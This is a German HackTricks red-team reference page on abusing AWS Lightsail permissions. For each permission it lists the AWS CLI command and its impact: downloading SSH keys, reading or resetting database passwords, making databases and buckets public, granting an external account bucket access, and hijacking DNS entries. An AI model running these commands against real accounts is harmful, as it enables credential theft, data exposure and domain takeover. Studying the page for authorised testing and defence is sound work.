AWS - Lightsail Privesc

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Lightsail

Für weitere Informationen zu Lightsail siehe:

pageAWS - Lightsail Enum

Es ist wichtig zu beachten, dass Lightsail keine IAM-Rollen des Benutzers verwendet, sondern einem von AWS verwalteten Konto zugeordnet ist. Daher können Sie diesen Dienst nicht zum Privilege Escalation missbrauchen. Es könnten jedoch sensible Daten wie Code, API-Schlüssel und Datenbankinformationen in diesem Dienst gefunden werden.

lightsail:DownloadDefaultKeyPair

Diese Berechtigung ermöglicht es Ihnen, die SSH-Schlüssel zum Zugriff auf die Instanzen zu erhalten:

aws lightsail download-default-key-pair

Potenzielle Auswirkungen: Finden sensibler Informationen innerhalb der Instanzen.

lightsail:GetInstanceAccessDetails

Diese Berechtigung ermöglicht es Ihnen, SSH-Schlüssel zu generieren, um auf die Instanzen zuzugreifen:

aws lightsail get-instance-access-details --instance-name <instance_name>

Potenzielle Auswirkungen: Sensible Informationen innerhalb der Instanzen finden.

lightsail:CreateBucketAccessKey

Diese Berechtigung ermöglicht es Ihnen, einen Schlüssel zum Zugriff auf den Bucket zu erhalten:

aws lightsail create-bucket-access-key --bucket-name <name>

Potenzielle Auswirkungen: Finde sensible Informationen innerhalb des Buckets.

lightsail:GetRelationalDatabaseMasterUserPassword

Diese Berechtigung ermöglicht es Ihnen, die Anmeldeinformationen zum Zugriff auf die Datenbank abzurufen:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Potenzielle Auswirkungen: Sensible Informationen in der Datenbank finden.

lightsail:UpdateRelationalDatabase

Diese Berechtigung ermöglicht es Ihnen, das Passwort zum Zugriff auf die Datenbank zu ändern:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Wenn die Datenbank nicht öffentlich ist, könnten Sie sie auch mit diesen Berechtigungen öffentlich machen:

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Potenzielle Auswirkungen: Sensible Informationen in der Datenbank finden.

lightsail:OpenInstancePublicPorts

Diese Berechtigung ermöglicht das Öffnen von Ports für das Internet.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Potenzielle Auswirkungen: Zugriff auf sensible Ports.

lightsail:PutInstancePublicPorts

Diese Berechtigung ermöglicht das Öffnen von Ports für das Internet. Beachten Sie, dass der Aufruf jeden nicht spezifizierten geöffneten Port schließt.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Potenzielle Auswirkungen: Zugriff auf sensible Ports.

lightsail:SetResourceAccessForBucket

Diese Berechtigungen ermöglichen es, einer Instanz Zugriff auf einen Bucket ohne zusätzliche Anmeldeinformationen zu gewähren

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Potenzielle Auswirkungen: Möglicher neuer Zugriff auf Eimer mit sensiblen Informationen.

lightsail:UpdateBucket

Mit dieser Berechtigung könnte ein Angreifer seinem eigenen AWS-Konto Lesezugriff auf Eimer gewähren oder die Eimer sogar für alle öffentlich machen:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Potenzielle Auswirkungen: Potenzieller neuer Zugriff auf Buckets mit sensiblen Informationen.

lightsail:UpdateContainerService

Mit diesen Berechtigungen könnte ein Angreifer Zugriff auf private ECRs vom Containerdienst gewähren.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Potenzielle Auswirkungen: Erhalten sensibler Informationen aus privatem ECR

lightsail:CreateDomainEntry

Ein Angreifer mit dieser Berechtigung könnte eine Subdomain erstellen und sie auf seine eigene IP-Adresse umleiten (Subdomain-Übernahme), oder einen SPF-Eintrag erstellen, der es ihm ermöglicht, E-Mails von der Domain zu fälschen, oder sogar die Hauptdomain auf seine eigene IP-Adresse setzen.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potenzielle Auswirkung: Übernahme einer Domain

lightsail:UpdateDomainEntry

Ein Angreifer mit dieser Berechtigung könnte eine Subdomain erstellen und sie auf seine eigene IP-Adresse umleiten (Subdomain-Übernahme), oder einen SPF-Eintrag erstellen, der es ihm ermöglicht, E-Mails von der Domain zu fälschen, oder sogar die Hauptdomain auf seine eigene IP-Adresse setzen.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Potenzielle Auswirkungen: Übernahme einer Domain

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Last updated